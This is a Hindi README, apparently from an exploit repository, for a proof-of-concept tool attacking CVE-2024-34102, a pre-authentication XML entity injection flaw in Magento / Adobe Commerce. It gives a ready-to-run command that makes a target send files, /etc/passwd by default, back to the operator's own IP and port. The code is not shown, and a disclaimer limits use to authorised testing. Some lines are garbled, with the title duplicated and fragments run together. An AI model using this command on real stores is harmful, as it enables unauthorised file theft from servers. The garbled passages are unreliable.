
CVE-2024-34102 के लिए POC। Magento / Adobe Commerce में एक पूर्व-प्रमाणीकरण XML इकाई इंजेक्शन समस्या।
CVE-2024-34102 के लिए POC। Magento / Adobe Commerce में पूर्व-प्रमाणीकरण XML एंटिटी इंजेक्शन समस्या।

यह POC उन लक्ष्य होस्टों से फ़ाइलें पढ़ने का प्रयास करेगा जो हाल ही में Magento / Adobe Commerce CVE-2024-34102 के लिए संवेदनशील हैं। यह POC इस सुरक्षा सलाह और Assetnote द्वारा इस शोध पर आधारित है।
इस POC को चलाने के लिए, आपके पास एक मशीन होनी चाहिए जिसका IP प्रकाशित और सुलभ हो।
poc.xml बनाता है।/etc/passwd)।requests लाइब्रेरीएकल लक्ष्य के विरुद्ध इस POC का उपयोग करने के लिए:
python cve-2024-34102.py -u target -ip your-machine-ip -p any-open-port-in-your-machine -r file-to-read-from-target (default is /etc/passwd)
किसी भी सुझाव या विचार के लिए, कृपया मुझसे संपर्क करें।
यह प्रदत्त टूल केवल शैक्षिक उद्देश्यों के लिए है। मैं किसी भी सिस्टम या नेटवर्क तक अनधिकृत पहुँच को प्रोत्साहित, समर्थन या स्वीकार नहीं करता। इस टूल का जिम्मेदारी से और केवल उन सिस्टमों पर उपयोग करें जिनका परीक्षण करने की आपको स्पष्ट अनुमति है। इस टूल के दुरुपयोग से उत्पन्न कोई भी कार्य और परिणाम आपकी अपनी जिम्मेदारी है।